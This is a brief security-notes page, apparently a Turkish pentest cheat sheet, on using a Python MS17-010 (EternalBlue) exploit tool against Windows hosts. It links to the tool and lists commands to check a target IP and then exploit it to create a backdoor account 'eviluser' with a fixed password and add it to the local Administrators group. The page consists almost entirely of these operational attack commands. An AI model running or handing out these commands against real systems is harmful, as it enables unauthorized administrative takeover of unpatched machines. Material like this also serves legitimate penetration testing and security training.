> For the complete documentation index, see [llms.txt](https://security.musana.net/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://security.musana.net/ms17-010-python-exploit.md).

# ms17-010 python exploit

[ms17-010](https://github.com/mez0cc/MS17-010-Python) aracını indir.

**check**

```
# python zzz_checker.py -t IP
```

**add user**

```
# python zzz_exploit.py -t IP -c 'net user eviluser Password1 /add'
```

**add user to localgroup**

```
# python zzz_exploit.py -t IP -c 'net localgroup Administrators eviluser /add'
```
